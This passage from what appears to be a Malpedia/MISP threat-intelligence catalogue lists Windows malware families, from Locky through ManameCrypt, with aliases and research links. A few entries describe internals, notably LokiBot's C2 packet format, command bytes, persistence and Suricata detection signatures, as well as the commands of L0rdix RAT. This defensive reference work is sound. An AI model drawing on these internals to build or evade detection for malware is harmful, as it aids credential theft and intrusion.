https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf
https://vixra.org/pdf/2002.0183v1.pdf
https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/
https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

Locky (Decryptor)

The tag is: misp-galaxy:malpedia="Locky (Decryptor)"

Locky (Decryptor) is also known as:

Table 2125. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor

Locky Loader

For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.

The tag is: misp-galaxy:malpedia="Locky Loader"

Locky Loader is also known as:

Table 2126. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader

LockPOS

The tag is: misp-galaxy:malpedia="LockPOS"

LockPOS is also known as:

Table 2127. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos
https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/
https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html
https://www.cyberbit.com/new-lockpos-malware-injection-technique/

Loda

Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.

The tag is: misp-galaxy:malpedia="Loda"

Loda is also known as:

LodaRAT
Nymeria

Table 2128. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html
https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware
https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html
https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html
https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/

LODEINFO

The tag is: misp-galaxy:malpedia="LODEINFO"

LODEINFO is also known as:

Table 2129. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo
https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html
https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html
https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf
https://twitter.com/jpcert_ac/status/1351355443730255872
https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf
https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html

Logedrut

The tag is: misp-galaxy:malpedia="Logedrut"

Logedrut is also known as:

Table 2130. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut
https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/

LogPOS

The tag is: misp-galaxy:malpedia="LogPOS"

LogPOS is also known as:

Table 2131. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos
https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html

LoJax

The tag is: misp-galaxy:malpedia="LoJax"

LoJax is also known as:

Table 2132. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax
https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government
https://www.youtube.com/watch?v=VeoXT0nEcFU
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf

Loki Password Stealer (PWS)

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\ C98066\”.

There can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:

FILE EXTENSION FILE DESCRIPTION .exe A copy of the malware that will execute every time the user account is logged into .lck A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts .hdb A database of hashes for data that has already been exfiltrated to the C2 server .kdb A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.

The second packet transmitted by Loki-Bot contains decrypted Windows credentials.

The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.

The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE PAYLOAD TYPE 0x26 Stolen Cryptocurrency Wallet 0x27 Stolen Application Data 0x28 Get C2 Commands from C2 Server 0x29 Stolen File 0x2A POS (Point of Sale?) 0x2B Keylogger Data 0x2C Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE INSTRUCTION DESCRIPTION 0x00 Download EXE & Execute 0x01 Download DLL & Load #1 0x02 Download DLL & Load #2 0x08 Delete HDB File 0x09 Start Keylogger 0x0A Mine & Steal Data 0x0E Exit Loki-Bot 0x0F Upgrade Loki-Bot 0x10 Change C2 Polling Frequency 0x11 Delete Executables & Exit

Suricata Signatures RULE SID RULE NAME 2024311 ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected 2024312 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 2024314 ET TROJAN Loki Bot File Exfiltration Detected 2024315 ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1 2024316 ET TROJAN Loki Bot Screenshot Exfiltration Detected 2024317 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 2024319 ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

The tag is: misp-galaxy:malpedia="Loki Password Stealer (PWS)"

Loki Password Stealer (PWS) is also known as:

Loki
LokiBot
LokiPWS

Table 2133. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
https://www.youtube.com/watch?v=K3Yxu_9OUxU
https://isc.sans.edu/diary/24372
http://www.malware-traffic-analysis.net/2017/06/12/index.html
https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads
https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/
https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html
https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/
https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/
https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html
https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850
https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file
http://reversing.fun/reversing/2021/06/08/lokibot.html
https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/
https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/
https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2
https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf
https://github.com/R3MRUM/loki-parse
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://lab52.io/blog/a-twisted-malware-infection-chain/
https://www.youtube.com/watch?v=-FxyzuRv6Wg
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://news.sophos.com/en-us/2020/05/14/raticate/
http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html
https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf
https://isc.sans.edu/diary/27282
https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html
https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files
https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html
https://www.lastline.com/blog/password-stealing-malware-loki-bot/
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://www.youtube.com/watch?v=N0wAh26wShE
https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/
https://phishme.com/loki-bot-malware/
https://securelist.com/loki-bot-stealing-corporate-passwords/87595/

LOLSnif

The tag is: misp-galaxy:malpedia="LOLSnif"

LOLSnif is also known as:

Table 2134. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif
https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63
https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/
https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/
https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/
https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062

LONGWATCH

The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

The tag is: misp-galaxy:malpedia="LONGWATCH"

LONGWATCH is also known as:

Table 2135. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

looChiper

LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families.

The tag is: misp-galaxy:malpedia="looChiper"

looChiper is also known as:

Table 2136. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper
https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool
https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/
https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/
https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html

Lookback

The tag is: misp-galaxy:malpedia="Lookback"

Lookback is also known as:

Table 2137. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback
https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/
https://nao-sec.org/2021/01/royal-road-redive.html
https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf
https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/
https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals
https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks
https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

L0rdix

L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:

Download and execute Update Open page (visible) Open page (invisible) Cmd Kill process Upload file HTTP Flood

L0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target’s clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.

The tag is: misp-galaxy:malpedia="L0rdix"

L0rdix is also known as:

lordix

Table 2138. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix
https://twitter.com/hexlax/status/1058356670835908610
https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py
https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/
https://www.bromium.com/decrypting-l0rdix-rats-c2/
https://blog.ensilo.com/l0rdix-attack-tool

Lorenz

The tag is: misp-galaxy:malpedia="Lorenz"

Lorenz is also known as:

Table 2139. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz
https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/
https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20
https://therecord.media/free-decrypter-available-for-lorenz-ransomware/
https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/

Loup

Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).

The tag is: misp-galaxy:malpedia="Loup"

Loup is also known as:

Table 2140. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.loup
https://twitter.com/Arkbird_SOLG/status/1295396936896438272
https://twitter.com/r3c0nst/status/1295275546780327936

LOWBALL

LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.

The tag is: misp-galaxy:malpedia="LOWBALL"

LOWBALL is also known as:

Table 2141. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball
https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/
https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/

LOWKEY

The tag is: misp-galaxy:malpedia="LOWKEY"

LOWKEY is also known as:

PortReuse

Table 2142. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf
https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/
https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html

Lucifer

The tag is: misp-galaxy:malpedia="Lucifer"

Lucifer is also known as:

Table 2143. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lucifer
https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/
https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/

Luminosity RAT

The tag is: misp-galaxy:malpedia="Luminosity RAT"

Luminosity RAT is also known as:

LuminosityLink

Table 2144. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat
https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/
https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/
https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/
http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html
https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/
https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
https://www.secureworks.com/research/threat-profiles/copper-fieldstone

LunchMoney

An uploader that can exfiltrate files to Dropbox.

The tag is: misp-galaxy:malpedia="LunchMoney"

LunchMoney is also known as:

Table 2145. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney
https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html
https://twitter.com/MrDanPerez/status/1097881406661902337

Lurk

The tag is: misp-galaxy:malpedia="Lurk"

Lurk is also known as:

Table 2146. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk
https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader

Luzo

The tag is: misp-galaxy:malpedia="Luzo"

Luzo is also known as:

Table 2147. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo

Lyposit

The tag is: misp-galaxy:malpedia="Lyposit"

Lyposit is also known as:

Adneukine
Bomba Locker
Lucky Locker

Table 2148. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit
http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html
https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/
http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html

M00nD3V Logger

The tag is: misp-galaxy:malpedia="M00nD3V Logger"

M00nD3V Logger is also known as:

Table 2149. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v
https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger

Machete

According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings. GoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence. Regarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL. The GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.

The tag is: misp-galaxy:malpedia="Machete"

Machete is also known as:

El Machete

Table 2150. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.machete
https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf
https://securelist.com/el-machete/66108/
https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6
https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html
https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html
https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/

MadMax

The tag is: misp-galaxy:malpedia="MadMax"

MadMax is also known as:

Table 2151. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax

Magala

The tag is: misp-galaxy:malpedia="Magala"

Magala is also known as:

Table 2152. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.magala
https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/

Magniber

The tag is: misp-galaxy:malpedia="Magniber"

Magniber is also known as:

Table 2153. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber
https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372
https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/
https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/
https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/
https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware
http://asec.ahnlab.com/1124
https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/
https://www.youtube.com/watch?v=lqWJaaofNf4
https://asec.ahnlab.com/en/19273/
https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/

Mailto

The tag is: misp-galaxy:malpedia="Mailto"

Mailto is also known as:

Koko Ransomware
NetWalker

Table 2154. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html
https://sites.temple.edu/care/ci-rw-attacks/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/
https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/
https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/
https://www.youtube.com/watch?v=q8of74upT_g
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/
https://www.ic3.gov/media/news/2020/200929-2.pdf
https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware
https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf
https://lopqto.me/posts/automated-dynamic-import-resolving
https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/
https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/
https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers
https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf
https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware
https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware
https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/
https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/
https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf
https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/
https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/
https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware
https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million
https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/
https://www.justice.gov/usao-mdfl/press-release/file/1360846/download
https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/
https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html
https://zero2auto.com/2020/05/19/netwalker-re/
https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://zengo.com/bitcoin-ransomware-detective-ucsf/
https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

Mail-O

The tag is: misp-galaxy:malpedia="Mail-O"

Mail-O is also known as:

Table 2155. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o
https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf
https://blog.group-ib.com/task
https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/
https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/

MajikPos

The tag is: misp-galaxy:malpedia="MajikPos"

MajikPos is also known as:

Table 2156. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos
http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/
https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos

Makadocs

The tag is: misp-galaxy:malpedia="Makadocs"

Makadocs is also known as:

Table 2157. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs
https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs
http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html
https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/
https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/

MakLoader

The tag is: misp-galaxy:malpedia="MakLoader"

MakLoader is also known as:

Table 2158. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader
https://twitter.com/James_inthe_box/status/1046844087469391872

Makop Ransomware

The tag is: misp-galaxy:malpedia="Makop Ransomware"

Makop Ransomware is also known as:

Table 2159. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware
https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/
https://twitter.com/siri_urz/status/1221797493849018368

Maktub

The tag is: misp-galaxy:malpedia="Maktub"

Maktub is also known as:

Table 2160. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub
https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/
https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html
https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/

MalumPOS

The tag is: misp-galaxy:malpedia="MalumPOS"

MalumPOS is also known as:

Table 2161. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos
http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf

Mamba

The tag is: misp-galaxy:malpedia="Mamba"

Mamba is also known as:

DiskCryptor
HDDCryptor

Table 2162. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba
https://securelist.com/the-return-of-mamba-ransomware/79403/
https://www.ic3.gov/Media/News/2021/210323.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/
https://www.youtube.com/watch?v=LUxOcpIRxmg

ManameCrypt

The tag is: misp-galaxy:malpedia="ManameCrypt"

ManameCrypt is also known as:

CryptoHost

Table 2163. Table References
Links
